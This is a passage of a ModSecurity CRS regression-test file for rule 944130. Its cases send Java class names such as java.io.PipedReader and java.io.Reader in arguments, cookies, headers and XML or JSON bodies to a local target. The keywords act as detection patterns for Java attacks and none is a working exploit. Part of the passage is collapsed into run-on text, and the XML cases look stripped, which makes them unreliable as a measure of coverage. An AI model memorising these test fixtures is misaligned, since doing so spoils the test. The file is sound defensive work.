"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.PipedOutputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-208 desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.PipedOutputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-209 desc: "Argument test includes 
keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.PipedReader" output: log_contains: "id \"944130\"" - test_title: 944130-210 desc: "Argument name includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.PipedReader=test" output: log_contains: "id \"944130\"" - test_title: 944130-211 desc: "Cookie test includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.PipedReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-212 desc: "Cookie name includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.PipedReader=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-213 desc: "Request header test includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.PipedReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-214 desc: "XML attribute value includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-215 desc: "XML element value includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" 
Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PipedReader" output: log_contains: "id \"944130\"" - test_title: 944130-216 desc: "Nested XML element value includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PipedReader" output: log_contains: "id \"944130\"" - test_title: 944130-217 desc: "Content-Type text/plain includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.PipedReader" output: log_contains: "id \"944130\"" - test_title: 944130-218 desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.PipedReader\"}" output: log_contains: "id \"944130\"" - test_title: 944130-219 desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" 
stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.PipedReader\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-220 desc: "Argument test includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.PrintStream" output: log_contains: "id \"944130\"" - test_title: 944130-221 desc: "Argument name includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.PrintStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-222 desc: "Cookie test includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.PrintStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-223 desc: "Cookie name includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.PrintStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-224 desc: "Request header test includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.PrintStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-225 desc: "XML attribute value includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: 
"element_value" output: log_contains: "id \"944130\"" - test_title: 944130-226 desc: "XML element value includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PrintStream" output: log_contains: "id \"944130\"" - test_title: 944130-227 desc: "Nested XML element value includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PrintStream" output: log_contains: "id \"944130\"" - test_title: 944130-228 desc: "Content-Type text/plain includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.PrintStream" output: log_contains: "id \"944130\"" - test_title: 944130-229 desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.PrintStream\"}" output: log_contains: "id \"944130\""
  # The line above is the tail of a case that starts earlier in the file; it is
  # kept as found.
  #
  # Positive tests for CRS rule id 944130. Each case sends one POST to
  # 127.0.0.1:80 (a local test target) with a single Java class-name keyword
  # placed in one request location, and expects the log to contain
  # id "944130".
  #
  # NOTE(review): in the XML cases the data shown is bare text ("element_value"
  # or the keyword alone) although Content-Type is application/xml. The XML
  # markup was presumably stripped when this page was extracted; as shown, the
  # "XML attribute value" cases carry no keyword at all, and the "XML element"
  # and "Nested XML element" cases are identical. Verify these against the
  # upstream fixture before using them to judge rule coverage.

  # Keyword java.io.PrintStream: JSON argument name (last case of this group).
  - test_title: 944130-230
    desc: "Content-Type application/json arg name includes keyword java.io.PrintStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.io.PrintStream\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # Keyword java.io.PushbackInputStream: argument value and name, cookie value
  # and name, request header, XML cases, text/plain body, JSON value and name.
  - test_title: 944130-231
    desc: "Argument test includes keyword java.io.PushbackInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.PushbackInputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-232
    desc: "Argument name includes keyword java.io.PushbackInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.PushbackInputStream=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-233
    desc: "Cookie test includes keyword java.io.PushbackInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.io.PushbackInputStream
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-234
    desc: "Cookie name includes keyword java.io.PushbackInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.io.PushbackInputStream=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-235
    desc: "Request header test includes keyword java.io.PushbackInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.io.PushbackInputStream
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): body as shown has no XML markup and no keyword; see the note
  # at the top of this block.
  - test_title: 944130-236
    desc: "XML attribute value includes keyword java.io.PushbackInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-237
    desc: "XML element value includes keyword java.io.PushbackInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.PushbackInputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-238
    desc: "Nested XML element value includes keyword java.io.PushbackInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.PushbackInputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-239
    desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.PushbackInputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-240
    desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.io.PushbackInputStream\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-241
    desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.io.PushbackInputStream\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # Keyword java.io.Reader: same eleven request locations as the group above.
  - test_title: 944130-242
    desc: "Argument test includes keyword java.io.Reader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.Reader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-243
    desc: "Argument name includes keyword java.io.Reader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.Reader=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-244
    desc: "Cookie test includes keyword java.io.Reader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.io.Reader
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-245
    desc: "Cookie name includes keyword java.io.Reader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.io.Reader=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-246
    desc: "Request header test includes keyword java.io.Reader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.io.Reader
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): body as shown has no XML markup and no keyword; see the note
  # at the top of this block.
  - test_title: 944130-247
    desc: "XML attribute value includes keyword java.io.Reader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-248
    desc: "XML element value includes keyword java.io.Reader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.Reader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-249
    desc: "Nested XML element value includes keyword java.io.Reader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.Reader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-250
    desc: "Content-Type text/plain includes keyword java.io.Reader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.Reader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-251
    desc: "Content-Type application/json arg value includes keyword java.io.Reader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.io.Reader\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-252
    desc: "Content-Type application/json arg name includes keyword java.io.Reader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
